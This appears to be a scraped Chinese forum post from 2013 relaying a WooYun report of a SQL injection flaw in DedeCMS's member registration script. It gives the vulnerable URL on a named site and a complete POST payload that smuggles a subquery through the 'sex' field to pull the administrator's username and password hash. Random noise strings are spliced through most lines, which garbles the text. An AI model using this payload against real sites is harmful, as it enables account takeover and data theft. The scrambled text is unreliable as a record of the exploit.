漏洞类型: SQL注射漏洞* p, W' t7 X6 C# H( X/ h5 V
简要描述:
2 I4 X/ ]5 B! v% ~
4 ], g3 w0 r$ [( u需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.( m0 ?3 k% v& o4 d
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
# F& Y( S/ M% \$ t3 g- g详细说明:跟这个漏洞$ U! V0 A# ?: K& `8 f
2 y# @' ~& }* @. g% s0 n
WooYun: Dedecms SQL注射导致审核机制绕过漏洞
6 g' ^9 |* O, Y: i" K) g9 j9 U是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
3 i' @1 O, W, J% p6 ^POST提交以下数据,其实不用POST提交的,这样隐蔽点." D0 Y+ ?6 T( d% j' K3 h3 [
2 z! S8 w5 a9 ~9 w- U0 G
www.political-security.com/member/reg_new.php
, F# A w6 u& U6 k0 L; h
* Y7 G5 @! {7 \6 kPOST
3 t5 `: n9 i' g9 ?
% C( z @1 I# H/ p8 l) e0 M/ mdopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
; F4 N1 }) z! x+ I: _userid=c4rp3nt3r&uname=c4rp3nt3r+ X: u) f; T5 u0 S% X
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss+ R0 g/ ~' J" r7 v
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
" I: ], O. N( X! q(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
8 d! p4 ]! V2 B& v ]%00&vdcode=glos&agree= |
发表于 2013-1-19 08:25:02
收藏
支持
反对